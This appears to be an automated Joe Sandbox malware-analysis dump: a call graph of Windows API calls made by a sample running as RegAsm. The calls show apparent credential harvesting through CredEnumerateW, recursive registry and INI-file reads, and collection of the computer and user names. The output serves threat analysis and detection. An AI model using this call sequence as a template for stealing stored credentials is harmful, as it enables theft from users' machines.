33685 404734 33534->33685 33691 404785 33534->33691 33694 403c16 33534->33694 33535 40baa0 33536 407e30 _strcmpi 33535->33536 33540 40bab0 33536->33540 33537->33531 33537->33533 33767 40b5e5 10 API calls 33537->33767 33538 40bafa SetCursor 33538->33408 33540->33538 33541 40baf1 qsort 33540->33541 33541->33538 34225 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33548->34225 33550 40b00e 33551 40b016 33550->33551 33552 40b01f GetStdHandle 33550->33552 34226 406d1a CreateFileA 33551->34226 33554 40b01c 33552->33554 33555 40b035 33554->33555 33556 40b12d 33554->33556 34227 406c62 LoadCursorA SetCursor 33555->34227 34231 406d77 9 API calls 33556->34231 33559 40b136 33570 40c580 18 API calls 33559->33570 33560 40b087 33567 40b0a1 33560->33567 34229 40a699 12 API calls 33560->34229 33561 40b042 33561->33560 33561->33567 34228 40a57c strlen WriteFile 33561->34228 33564 40b0d6 33565 40b116 CloseHandle 33564->33565 33566 40b11f SetCursor 33564->33566 33565->33566 33566->33559 33567->33564 34230 406d77 9 API calls 33567->34230 33569->33401 33570->33405 33583 409a32 33571->33583 33574 409c80 memcpy memcpy 33577 409cda 33574->33577 33575 409d18 ??2@YAPAXI ??2@YAPAXI 33578 409d54 ??2@YAPAXI 33575->33578 33580 409d8b 33575->33580 33576 408db6 12 API calls 33576->33577 33577->33574 33577->33575 33577->33576 33578->33580 33580->33580 33593 409b9c 33580->33593 33582 4023c1 33582->33482 33584 409a44 33583->33584 33585 409a3d ??3@YAXPAX 33583->33585 33586 409a52 33584->33586 33587 409a4b ??3@YAXPAX 33584->33587 33585->33584 33588 409a63 33586->33588 33589 409a5c ??3@YAXPAX 33586->33589 33587->33586 33590 409a83 ??2@YAPAXI ??2@YAPAXI 33588->33590 33591 409a73 ??3@YAXPAX 33588->33591 33592 409a7c ??3@YAXPAX 33588->33592 33589->33588 33590->33574 33591->33592 33592->33590 33594 407a55 free 33593->33594 33595 409ba5 33594->33595 33596 407a55 free 33595->33596 33597 409bad 33596->33597 33598 407a55 free 33597->33598 33599 409bb5 33598->33599 33600 407a55 free 33599->33600 33601 409bbd 33600->33601 33602 407a1f 4 API calls 33601->33602 33603 409bd0 33602->33603 33604 407a1f 4 API calls 33603->33604 33605 409bda 33604->33605 33606 407a1f 4 API calls 33605->33606 33607 409be4 33606->33607 33608 407a1f 4 API calls 33607->33608 33609 409bee 33608->33609 33609->33582 33611 410d0e LoadLibraryA 33610->33611 33612 410dca 33611->33612 33613 410dfd memset 33612->33613 33653 4070ae 33612->33653 33615 410e1d 33613->33615 33656 410a9c RegOpenKeyExA 33615->33656 33617 410dee SHGetSpecialFolderPathA 33620 401e9e strlen strlen 33617->33620 33619 410e4a 33621 410e7f _mbscpy 33619->33621 33657 410d3d _mbscpy 33619->33657 33620->33485 33620->33486 33621->33620 33623 410e5b 33658 410add RegQueryValueExA 33623->33658 33625 410e73 RegCloseKey 33625->33621 33626->33489 33627->33495 33659 410a9c RegOpenKeyExA 33628->33659 33630 401c4c 33631 401cad 33630->33631 33660 410add RegQueryValueExA 33630->33660 33631->33498 33631->33499 33633 401c6a 33634 401c71 strchr 33633->33634 33635 401ca4 RegCloseKey 33633->33635 33634->33635 33636 401c85 strchr 33634->33636 33635->33631 33636->33635 33637 401c94 33636->33637 33661 406f06 strlen 33637->33661 33639 401ca1 33639->33635 33640->33501 33641->33486 33642->33492 33643->33513 33664 410a9c RegOpenKeyExA 33644->33664 33646 410b34 33647 410b5d 33646->33647 33665 410add RegQueryValueExA 33646->33665 33647->33513 33649 410b4c RegCloseKey 33649->33647 33651->33513 33652->33506 33654 4070bd GetVersionExA 33653->33654 33655 4070ce 33653->33655 33654->33655 33655->33613 33655->33617 33656->33619 33657->33623 33658->33625 33659->33630 33660->33633 33662 406f17 33661->33662 33663 406f1a memcpy 33661->33663 33662->33663 33663->33639 33664->33646 33665->33649 33667 409b40 33666->33667 33669 409b4e 33666->33669 33674 409901 memset SendMessageA 33667->33674 33670 409b99 33669->33670 33671 409b8b 33669->33671 33670->33530 33675 409868 SendMessageA 33671->33675 33673->33526 33674->33669 33675->33670 33676->33534 33677->33535 33679 410807 33678->33679 33680 4107fc FreeLibrary 33678->33680 33679->33535 33680->33679 33682 410816 33681->33682 33683 4107f1 FreeLibrary 33682->33683 33684 410825 33683->33684 33684->33535 33686 404785 FreeLibrary 33685->33686 33687 40473b LoadLibraryA 33686->33687 33689 40474c 33687->33689 33688 404781 33688->33535 33689->33688 33690 404785 FreeLibrary 33689->33690 33690->33688 33692 4047a3 33691->33692 33693 404799 FreeLibrary 33691->33693 33692->33535 33693->33692 33695 4107f1 FreeLibrary 33694->33695 33696 403c30 LoadLibraryA 33695->33696 33697 403c44 33696->33697 33698 4107f1 FreeLibrary 33697->33698 33699 403c6b 33697->33699 33698->33699 33700 404734 2 API calls 33699->33700 33701 403c86 33700->33701 33768 4036e5 33701->33768 33704 4036e5 27 API calls 33705 403c9a 33704->33705 33706 4036e5 27 API calls 33705->33706 33707 403ca4 33706->33707 33708 4036e5 27 API calls 33707->33708 33709 403cae 33708->33709 33780 4085d2 33709->33780 33717 403ce5 33718 403cf7 33717->33718 33968 402bd1 40 API calls 33717->33968 33828 410a9c RegOpenKeyExA 33718->33828 33721 403d0a 33722 403d1c 33721->33722 33969 402bd1 40 API calls 33721->33969 33829 402c5d 33722->33829 33726 4070ae GetVersionExA 33727 403d31 33726->33727 33847 410a9c RegOpenKeyExA 33727->33847 33729 403d51 33730 403d61 33729->33730 33848 402b22 memset 33729->33848 33857 410a9c RegOpenKeyExA 33730->33857 33733 403d87 33734 403d97 33733->33734 33735 402b22 47 API calls 33733->33735 33858 410a9c RegOpenKeyExA 33734->33858 33735->33734 33737 403dbd 33738 403dcd 33737->33738 33739 402b22 47 API calls 33737->33739 33740 410808 FreeLibrary 33738->33740 33739->33738 33741 403ddd 33740->33741 33742 404785 FreeLibrary 33741->33742 33743 403de8 33742->33743 33859 402fdb 33743->33859 33746 402fdb 34 API calls 33747 403e00 33746->33747 33875 4032b7 33747->33875 33756 403e3b 33757 403e73 33756->33757 33758 403e46 _mbscpy 33756->33758 33922 40fb00 33757->33922 33971 40f334 324 API calls 33758->33971 33767->33537 33769 4036fb 33768->33769 33772 4037c5 33768->33772 33972 410863 UuidFromStringA UuidFromStringA 33769->33972 33772->33704 33773 403716 strchr 33773->33772 33774 403730 33773->33774 33976 4021b6 memset 33774->33976 33776 40373f _mbscpy _mbscpy strlen 33777 4037a4 _mbscpy 33776->33777 33778 403789 sprintf 33776->33778 33977 4023e5 16 API calls 33777->33977 33778->33777 33781 4085e2 33780->33781 33978 4082cd 11 API calls 33781->33978 33785 408600 33786 403cba 33785->33786 33787 40860b memset 33785->33787 33798 40821d 33786->33798 33981 410b62 RegEnumKeyExA 33787->33981 33789 4086d2 RegCloseKey 33789->33786 33791 408637 33791->33789 33792 40865c memset 33791->33792 33982 410a9c RegOpenKeyExA 33791->33982 33985 410b62 RegEnumKeyExA 33791->33985 33983 410add RegQueryValueExA 33792->33983 33795 408694 33984 40848b 9 API calls 33795->33984 33797 4086ab RegCloseKey 33797->33791 33986 410a9c RegOpenKeyExA 33798->33986 33800 40823f 33801 403cc6 33800->33801 33802 408246 memset 33800->33802 33810 4086e0 33801->33810 33987 410b62 RegEnumKeyExA 33802->33987 33804 40826f 33805 4082bf RegCloseKey 33804->33805 33988 410a9c RegOpenKeyExA 33804->33988 33989 4080ed 10 API calls 33804->33989 33990 410b62 RegEnumKeyExA 33804->33990 33805->33801 33809 4082a2 RegCloseKey 33809->33804 33991 4045db 33810->33991 33814 40872d 33817 408737 wcslen 33814->33817 33818 4088ef 33814->33818 33816 40872b CredEnumerateW 33816->33814 33817->33818 33824 40876a 33817->33824 33997 404656 33818->33997 33819 40877a wcsncmp 33819->33824 33821 404734 2 API calls 33821->33824 33822 404785 FreeLibrary 33822->33824 33823 408812 memset 33823->33824 33825 40883c memcpy wcschr 33823->33825 33824->33818 33824->33819 33824->33821 33824->33822 33824->33823 33824->33825 33826 4088c3 LocalFree 33824->33826 34000 40466b _mbscpy 33824->34000 33825->33824 33826->33824 33827 410a9c RegOpenKeyExA 33827->33717 33828->33721 34001 410a9c RegOpenKeyExA 33829->34001 33831 402c7a 33832 402da5 33831->33832 33833 402c87 memset 33831->33833 33832->33726 34002 410b62 RegEnumKeyExA 33833->34002 33835 402d9c RegCloseKey 33835->33832 33836 410b1e 3 API calls 33837 402ce4 memset sprintf 33836->33837 34003 410a9c RegOpenKeyExA 33837->34003 33839 402d28 33840 402d3a sprintf 33839->33840 34006 402bd1 40 API calls 33839->34006 34004 410a9c RegOpenKeyExA 33840->34004 33845 402cb2 33845->33835 33845->33836 33846 402d9a 33845->33846 34005 410b62 RegEnumKeyExA 33845->34005 34007 402bd1 40 API calls 33845->34007 33846->33835 33847->33729 34008 410b62 RegEnumKeyExA 33848->34008 33850 402bbb RegCloseKey 33850->33730 33851 406f06 2 API calls 33853 402b58 33851->33853 33853->33850 33853->33851 33856 402bb8 33853->33856 34009 410a9c RegOpenKeyExA 33853->34009 34010 402a9d memset 33853->34010 34018 410b62 RegEnumKeyExA 33853->34018 33856->33850 33857->33733 33858->33737 34058 410a9c RegOpenKeyExA 33859->34058 33861 402ff9 33862 403006 memset 33861->33862 33863 40312c 33861->33863 34059 410b62 RegEnumKeyExA 33862->34059 33863->33746 33865 403122 RegCloseKey 33865->33863 33866 410b1e 3 API calls 33867 403058 memset sprintf 33866->33867 34060 410a9c RegOpenKeyExA 33867->34060 33869 4030a2 memset 34061 410b62 RegEnumKeyExA 33869->34061 33871 4030f9 RegCloseKey 33873 403033 33871->33873 33873->33865 33873->33866 33873->33869 33873->33871 33874 410b62 RegEnumKeyExA 33873->33874 34062 402db3 26 API calls 33873->34062 33874->33873 33876 4032d5 33875->33876 33877 4033a9 33875->33877 34063 4021b6 memset 33876->34063 33890 4034e4 memset memset 33877->33890 33879 4032e1 34064 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33879->34064 33881 4032ea 33882 4032f8 memset GetPrivateProfileSectionA 33881->33882 34065 4023e5 16 API calls 33881->34065 33882->33877 33887 40332f 33882->33887 33884 40339b strlen 33884->33877 33884->33887 33886 403350 strchr 33886->33887 33887->33877 33887->33884 34066 4021b6 memset 33887->34066 34067 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33887->34067 34068 4023e5 16 API calls 33887->34068 33891 410b1e 3 API calls 33890->33891 33892 40353f 33891->33892 33893 40357f 33892->33893 33894 403546 _mbscpy 33892->33894 33898 403985 33893->33898 34069 406d55 strlen _mbscat 33894->34069 33896 403565 _mbscat 34070 4033f0 19 API calls 33896->34070 34071 40466b _mbscpy 33898->34071 33900 4039aa 33904 4039ff 33900->33904 34072 40f460 memset memset 33900->34072 34093 40f6e2 33900->34093 34109 4038e8 21 API calls 33900->34109 33905 404785 FreeLibrary 33904->33905 33906 403a0b 33905->33906 33907 4037ca memset memset 33906->33907 34117 444551 memset 33907->34117 33910 4038e2 33910->33756 33970 40f334 324 API calls 33910->33970 33912 40382e 33913 406f06 2 API calls 33912->33913 33914 403843 33913->33914 33915 406f06 2 API calls 33914->33915 33916 403855 strchr 33915->33916 33917 403884 _mbscpy 33916->33917 33918 403897 strlen 33916->33918 33919 4038bf _mbscpy 33917->33919 33918->33919 33920 4038a4 sprintf 33918->33920 34129 4023e5 16 API calls 33919->34129 33920->33919 33923 44b090 33922->33923 33924 40fb10 RegOpenKeyExA 33923->33924 33925 403e7f 33924->33925 33926 40fb3b 33924->33926 33936 40f96c 33925->33936 33927 40fb55 RegQueryValueExA 33926->33927 33928 40fc2d RegCloseKey 33926->33928 33929 40fc23 RegCloseKey 33927->33929 33930 40fb84 33927->33930 33928->33925 33929->33928 33931 404734 2 API calls 33930->33931 33932 40fb91 33931->33932 33932->33929 33933 40fc19 LocalFree 33932->33933 33934 40fbdd memcpy memcpy 33932->33934 33933->33929 34134 40f802 9 API calls 33934->34134 33937 4070ae GetVersionExA 33936->33937 33938 40f98d 33937->33938 33939 4045db 2 API calls 33938->33939 33947 40f9a9 33939->33947 33940 40fae6 33941 404656 FreeLibrary 33940->33941 33942 403e85 33941->33942 33948 4442ea memset 33942->33948 33943 40fa13 memset WideCharToMultiByte 33944 40fa43 _strnicmp 33943->33944 33943->33947 33945 40fa5b WideCharToMultiByte 33944->33945 33944->33947 33946 40fa88 WideCharToMultiByte 33945->33946 33945->33947 33946->33947 33947->33940 33947->33943 33949 410dbb 9 API calls 33948->33949 33950 444329 33949->33950 34135 40759e strlen strlen 33950->34135 33955 410dbb 9 API calls 33956 444350 33955->33956 33957 40759e 3 API calls 33956->33957 33958 44435a 33957->33958 33959 444212 65 API calls 33958->33959 33960 444366 memset memset 33959->33960 33961 410b1e 3 API calls 33960->33961 33962 4443b9 ExpandEnvironmentStringsA strlen 33961->33962 33963 4443f4 _strcmpi 33962->33963 33964 4443e5 33962->33964 33965 403e91 33963->33965 33966 44440c 33963->33966 33964->33963 33965->33535 33967 444212 65 API calls 33966->33967 33967->33965 33968->33718 33969->33722 33970->33756 33971->33757 33973 40370e 33972->33973 33974 41088d 33972->33974 33973->33772 33973->33773 33974->33973 33975 4108be memcpy CoTaskMemFree 33974->33975 33975->33973 33976->33776 33977->33772 33979 40841c 33978->33979 33980 410a9c RegOpenKeyExA 33979->33980 33980->33785 33981->33791 33982->33791 33983->33795 33984->33797 33985->33791 33986->33800 33987->33804 33988->33804 33989->33809 33990->33804 33992 404656 FreeLibrary 33991->33992 33993 4045e3 LoadLibraryA 33992->33993 33994 404643 33993->33994 33995 4045f4 33993->33995 33994->33814 33994->33816 33994->33818 33995->33994 33996 404656 FreeLibrary 33995->33996 33996->33994 33998 403cd2 33997->33998 33999 40465c FreeLibrary 33997->33999 33998->33827 33999->33998 34000->33824 34001->33831 34002->33845 34003->33839 34004->33845 34005->33845 34006->33840 34007->33845 34008->33853 34009->33853 34019 410b62 RegEnumKeyExA 34010->34019 34012 402ad0 34013 402b15 RegCloseKey 34012->34013 34017 402b14 34012->34017 34020 410a9c RegOpenKeyExA 34012->34020 34021 402a14 memset 34012->34021 34029 410b62 RegEnumKeyExA 34012->34029 34013->33853 34017->34013 34018->33853 34019->34012 34020->34012 34030 410b62 RegEnumKeyExA 34021->34030 34023 402a93 RegCloseKey 34023->34012 34025 402a48 34025->34023 34031 410a9c RegOpenKeyExA 34025->34031 34032 4027be 34025->34032 34047 410b62 RegEnumKeyExA 34025->34047 34029->34012 34030->34025 34031->34025 34033 40285a memset 34032->34033 34048 4029a2 RegQueryValueExA 34033->34048 34035 402885 34035->34033 34036 402998 RegCloseKey 34035->34036 34054 4021b6 memset 34035->34054 34036->34025 34038 402898 _mbscpy 34039 4029a2 4 API calls 34038->34039 34043 4028d4 34039->34043 34040 4029a2 RegQueryValueExA WideCharToMultiByte strlen memcpy 34040->34043 34041 410ab6 RegQueryValueExA 34041->34043 34043->34040 34043->34041 34055 401989 _mbscpy _mbscat _mbscat 34043->34055 34056 402624 10 API calls 34043->34056 34045 40296d _mbscpy 34057 4023e5 16 API calls 34045->34057 34047->34025 34049 4029f2 34048->34049 34050 4029dd 34048->34050 34049->34035 34051 4029f7 WideCharToMultiByte 34050->34051 34052 4029e9 34050->34052 34051->34049 34053 406f06 2 API calls 34052->34053 34053->34049 34054->34038 34055->34043 34056->34045 34057->34035 34058->33861 34059->33873 34060->33873 34061->33873 34062->33873 34063->33879 34064->33881 34065->33882 34066->33886 34067->33887 34068->33887 34069->33896 34070->33893 34071->33900 34110 4078ba 34072->34110 34075 4078ba _mbsnbcat 34076 40f5a3 RegOpenKeyExA 34075->34076 34077 40f5c3 RegQueryValueExA 34076->34077 34078 40f6d9 34076->34078 34079 40f6d0 RegCloseKey 34077->34079 34080 40f5f0 34077->34080 34078->33900 34079->34078 34080->34079 34090 40f675 34080->34090 34114 40466b _mbscpy 34080->34114 34082 40f611 34084 404734 2 API calls 34082->34084 34088 40f616 34084->34088 34085 40f69e RegQueryValueExA 34085->34079 34087 40f6c1 34085->34087 34086 40f66a 34089 404785 FreeLibrary 34086->34089 34087->34079 34088->34086 34091 40f661 LocalFree 34088->34091 34092 40f645 memcpy 34088->34092 34089->34090 34090->34079 34115 4012ee strlen 34090->34115 34091->34086 34092->34091 34116 40466b _mbscpy 34093->34116 34095 40f6fa 34096 4045db 2 API calls 34095->34096 34097 40f708 34096->34097 34098 40f7e2 34097->34098 34099 404734 2 API calls 34097->34099 34100 404656 FreeLibrary 34098->34100 34104 40f715 34099->34104 34101 40f7f1 34100->34101 34102 404785 FreeLibrary 34101->34102 34103 40f7fc 34102->34103 34103->33900 34104->34098 34105 40f797 WideCharToMultiByte 34104->34105 34106 40f7b8 strlen 34105->34106 34107 40f7d9 LocalFree 34105->34107 34106->34107 34108 40f7c8 _mbscpy 34106->34108 34107->34098 34108->34107 34109->33900 34111 4078e6 34110->34111 34112 4078c7 _mbsnbcat 34111->34112 34113 4078ea 34111->34113 34112->34111 34113->34075 34114->34082 34115->34085 34116->34095 34130 410a9c RegOpenKeyExA 34117->34130 34119 44458b 34120 40381a 34119->34120 34131 410add RegQueryValueExA 34119->34131 34120->33910 34128 4021b6 memset 34120->34128 34122 4445a4 34123 4445dc RegCloseKey 34122->34123 34132 410add RegQueryValueExA 34122->34132 34123->34120 34125 4445c1 34125->34123 34133 444879 30 API calls 34125->34133 34127 4445da 34127->34123 34128->33912 34129->33910 34130->34119 34131->34122 34132->34125 34133->34127 34134->33933 34136 4075c9 34135->34136 34137 4075bb _mbscat 34135->34137 34138 444212 34136->34138 34137->34136 34154 407e9d 34138->34154 34141 44424d 34142 444274 34141->34142 34162 444196 34141->34162 34173 407ef8 34141->34173 34143 407e9d 9 API calls 34142->34143 34146 4442a0 34143->34146 34145 407ef8 9 API calls 34145->34146 34146->34145 34147 4442ce 34146->34147 34153 444212 65 API calls 34146->34153 34183 407e62 34146->34183 34187 407f90 34147->34187 34151 407f90 FindClose 34152 4442e4 34151->34152 34152->33955 34153->34146 34155 407f90 FindClose 34154->34155 34156 407eaa 34155->34156 34157 406f06 2 API calls 34156->34157 34158 407ebd strlen strlen 34157->34158 34159 407ee1 34158->34159 34160 407eea 34158->34160 34190 4070e3 strlen _mbscat _mbscpy _mbscat 34159->34190 34160->34141 34191 406d01 CreateFileA 34162->34191 34164 4441a1 34165 44420e 34164->34165 34166 4441aa GetFileSize 34164->34166 34165->34141 34167 444203 CloseHandle 34166->34167 34168 4441bd ??2@YAPAXI SetFilePointer 34166->34168 34167->34165 34192 407560 ReadFile 34168->34192 34170 4441e4 34193 444059 34170->34193 34174 407f03 FindFirstFileA 34173->34174 34175 407f24 FindNextFileA 34173->34175 34176 407f3f 34174->34176 34177 407f46 strlen strlen 34175->34177 34178 407f3a 34175->34178 34176->34177 34182 407f7f 34176->34182 34180 407f76 34177->34180 34177->34182 34179 407f90 FindClose 34178->34179 34179->34176 34224 4070e3 strlen _mbscat _mbscpy _mbscat 34180->34224 34182->34141 34184 407e94 34183->34184 34185 407e6c strcmp 34183->34185 34184->34146 34185->34184 34186 407e83 strcmp 34185->34186 34186->34184 34188 407fa3 34187->34188 34189 407f99 FindClose 34187->34189 34188->34151 34189->34188 34190->34160 34191->34164 34192->34170 34194 44b090 34193->34194 34195 444066 wcslen ??2@YAPAXI WideCharToMultiByte 34194->34195 34208 44338b 6 API calls 34195->34208 34197 44409f 34198 4440bf strlen 34197->34198 34209 4434fc ??3@YAXPAX ??2@YAPAXI 34198->34209 34200 4440df memcpy 34210 443607 34200->34210 34202 44413d ??3@YAXPAX 34220 443473 9 API calls 34202->34220 34205 406f06 2 API calls 34205->34202 34207 44418f ??3@YAXPAX 34207->34167 34208->34197 34209->34200 34221 407948 free free 34210->34221 34212 443639 34222 407948 free free 34212->34222 34214 44391c 34214->34202 34214->34205 34215 407a1f 4 API calls 34217 443644 34215->34217 34216 443528 19 API calls 34216->34217 34217->34214 34217->34215 34217->34216 34218 44379d memcpy 34217->34218 34223 442d8e 9 API calls 34217->34223 34218->34217 34220->34207 34221->34212 34222->34217 34223->34217 34224->34182 34225->33550 34226->33554 34227->33561 34228->33560 34229->33567 34230->33564 34231->33559 34249 411853 RtlInitializeCriticalSection memset 34250 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34425 40a256 13 API calls 34427 432e5b 17 API calls 34429 43fa5a 20 API calls 34252 401060 41 API calls 34432 427260 CloseHandle memset memset 34256 410c68 FindResourceA SizeofResource LoadResource LockResource 34434 405e69 13 API calls 34258 433068 15 API calls __fprintf_l 34436 414a6d 18 API calls 34437 43fe6f 134 API calls 34260 424c6d 15 API calls __fprintf_l 34438 426741 19 API calls 34262 440c70 17 API calls 34263 443c71 43 API calls 34266 427c79 24 API calls 34441 416e7e memset __fprintf_l 34270 42800b 47 API calls 34271 425115 85 API calls __fprintf_l 34444 41960c 61 API calls 34272 43f40c 122 API calls __fprintf_l 34275 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34276 43f81a 20 API calls 34278 414c20 memset memset 34279 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34448 414625 18 API calls 34449 404225 modf 34450 403a26 strlen WriteFile 34452 40422a 12 API calls 34456 427632 memset memset memcpy 34457 40ca30 59 API calls 34458 404235 26 API calls 34280 42ec34 61 API calls __fprintf_l 34281 425115 76 API calls __fprintf_l 34459 425115 77 API calls __fprintf_l 34461 44223a 38 API calls 34287 43183c 112 API calls 34462 44b2c5 _onexit __dllonexit 34467 42a6d2 memcpy __allrem 34289 405cda 65 API calls 34475 43fedc 138 API calls 34476 4116e1 16 API calls __fprintf_l 34292 4244e6 19 API calls 34294 42e8e8 127 API calls __fprintf_l 34295 4118ee RtlLeaveCriticalSection 34481 43f6ec 22 API calls 34297 425115 119 API calls __fprintf_l 34298 410cf3 EnumResourceNamesA 34484 4492f0 memcpy memcpy 34486 43fafa 18 API calls 34488 4342f9 15 API calls __fprintf_l 34299 4144fd 19 API calls 34490 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34491 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34494 443a84 _mbscpy 34496 43f681 17 API calls 34302 404487 22 API calls 34498 415e8c 16 API calls __fprintf_l 34306 411893 RtlDeleteCriticalSection __fprintf_l 34307 41a492 42 API calls 34502 403e96 34 API calls 34503 410e98 memset SHGetPathFromIDList SendMessageA 34309 426741 109 API calls __fprintf_l 34310 4344a2 18 API calls 34311 4094a2 10 API calls 34506 4116a6 15 API calls __fprintf_l 34507 43f6a4 17 API calls 34508 440aa3 20 API calls 34510 427430 45 API calls 34314 4090b0 7 API calls 34315 4148b0 15 API calls 34317 4118b4 RtlEnterCriticalSection 34318 4014b7 CreateWindowExA 34319 40c8b8 19 API calls 34321 4118bf RtlTryEnterCriticalSection 34515 42434a 18 API calls __fprintf_l 34517 405f53 12 API calls 34329 43f956 59 API calls 34331 40955a 17 API calls 34332 428561 36 API calls 34333 409164 7 API calls 34521 404366 19 API calls 34525 40176c ExitProcess 34528 410777 42 API calls 34338 40dd7b 51 API calls 34339 425d7c 16 API calls __fprintf_l 34530 43f6f0 25 API calls 34531 42db01 22 API calls 34340 412905 15 API calls __fprintf_l 34532 403b04 54 API calls 34533 405f04 SetDlgItemTextA GetDlgItemTextA 34534 44b301 ??3@YAXPAX 34537 4120ea 14 API calls 3 library calls 34538 40bb0a 8 API calls 34540 413f11 strcmp 34344 434110 17 API calls __fprintf_l 34347 425115 108 API calls __fprintf_l 34541 444b11 _onexit 34349 425115 76 API calls __fprintf_l 34352 429d19 10 API calls 34544 444b1f __dllonexit 34545 409f20 _strcmpi 34354 42b927 31 API calls 34548 433f26 19 API calls __fprintf_l 34549 44b323 FreeLibrary 34550 427f25 46 API calls 34551 43ff2b 17 API calls 33219 444b36 33222 444b10 33219->33222 33221 444b3f 33223 444b1f __dllonexit 33222->33223 33224 444b19 _onexit 33222->33224 33223->33221 33224->33223 34552 43fb30 19 API calls 34361 414d36 16 API calls 34363 40ad38 7 API calls 34554 433b38 16 API calls __fprintf_l 34232 44b33b 34233 44b344 ??3@YAXPAX 34232->34233 34234 44b34b 34232->34234 34233->34234 34235 44b354 ??3@YAXPAX 34234->34235 34236 44b35b 34234->34236 34235->34236 34237 44b364 ??3@YAXPAX 34236->34237 34238 44b36b 34236->34238 34237->34238 34239 44b374 ??3@YAXPAX 34238->34239 34240 44b37b 34238->34240 34239->34240 34367 426741 21 API calls 34368 40c5c3 124 API calls 34370 43fdc5 17 API calls 34555 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34373 4161cb memcpy memcpy memcpy memcpy 33234 44b3cf 33235 44b3e6 33234->33235 33237 44b454 33234->33237 33235->33237 33241 44b40e 33235->33241 33238 44b405 33238->33237 33239 44b435 VirtualProtect 33238->33239 33239->33237 33240 44b444 VirtualProtect 33239->33240 33240->33237 33242 44b413 33241->33242 33247 44b454 33242->33247 33248 44b42b 33242->33248 33244 44b41c 33245 44b435 VirtualProtect 33244->33245 33244->33247 33246 44b444 VirtualProtect 33245->33246 33245->33247 33246->33247 33249 44b431 33248->33249 33250 44b435 VirtualProtect 33249->33250 33251 44b454 33249->33251 33250->33251 33252 44b444 VirtualProtect 33250->33252 33252->33251 34560 43ffc8 18 API calls 34374 4281cc 15 API calls __fprintf_l 34562 4383cc 110 API calls __fprintf_l 34375 4275d3 41 API calls 34563 4153d3 22 API calls __fprintf_l 34376 444dd7 _XcptFilter 34568 4013de 15 API calls 34570 425115 111 API calls __fprintf_l 34571 43f7db 18 API calls 34574 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34378 4335ee 16 API calls __fprintf_l 34576 429fef 11 API calls 34379 444deb _exit _c_exit 34577 40bbf0 138 API calls 34382 425115 79 API calls __fprintf_l 34581 437ffa 22 API calls 34386 4021ff 14 API calls 34387 43f5fc 149 API calls 34582 40e381 9 API calls 34389 405983 40 API calls 34390 42b186 27 API calls __fprintf_l 34391 427d86 76 API calls 34392 403585 20 API calls 34394 42e58e 18 API calls __fprintf_l 34397 425115 75 API calls __fprintf_l 34399 401592 8 API calls 33225 410b92 33228 410a6b 33225->33228 33227 410bb2 33229 410a77 33228->33229 33230 410a89 GetPrivateProfileIntA 33228->33230 33233 410983 memset _itoa WritePrivateProfileStringA 33229->33233 33230->33227 33232 410a84 33232->33227 33233->33232 34586 434395 16 API calls 34401 441d9c memcmp 34588 43f79b 119 API calls 34402 40c599 32 API calls 34589 426741 87 API calls 34406 4401a6 21 API calls 34408 426da6 memcpy memset memset memcpy 34409 4335a5 15 API calls 34411 4299ab memset memset memcpy memset memset 34412 40b1ab 8 API calls 34594 425115 76 API calls __fprintf_l 34598 4113b2 18 API calls 2 library calls 34602 40a3b8 memset sprintf SendMessageA 33253 410bbc 33256 4109cf 33253->33256 33257 4109dc 33256->33257 33258 410a23 memset GetPrivateProfileStringA 33257->33258 33259 4109ea memset 33257->33259 33264 407646 strlen 33258->33264 33269 4075cd sprintf memcpy 33259->33269 33262 410a0c WritePrivateProfileStringA 33263 410a65 33262->33263 33265 40765a 33264->33265 33266 40765c 33264->33266 33265->33263 33268 4076a3 33266->33268 33270 40737c strtoul 33266->33270 33268->33263 33269->33262 33270->33266 34414 40b5bf memset memset _mbsicmp

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 159 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 160 408450-408453 159->160 161 40841c 159->161 163 408484-408488 160->163 164 408455-40845e 160->164 162 408422-40842b 161->162 165 408432-40844e 162->165 166 40842d-408431 162->166 167 408460-408464 164->167 168 408465-408482 164->168 165->160 165->162 166->165 167->168 168->163 168->164
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0040832F
                                                                                                                                                                                                • memset.MSVCRT ref: 00408343
                                                                                                                                                                                                • memset.MSVCRT ref: 0040835F
                                                                                                                                                                                                • memset.MSVCRT ref: 00408376
                                                                                                                                                                                                • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                                • strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                                • strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                                • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                                                • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                                                • API String ID: 1832431107-3760989150
                                                                                                                                                                                                • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                                                                                                                • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
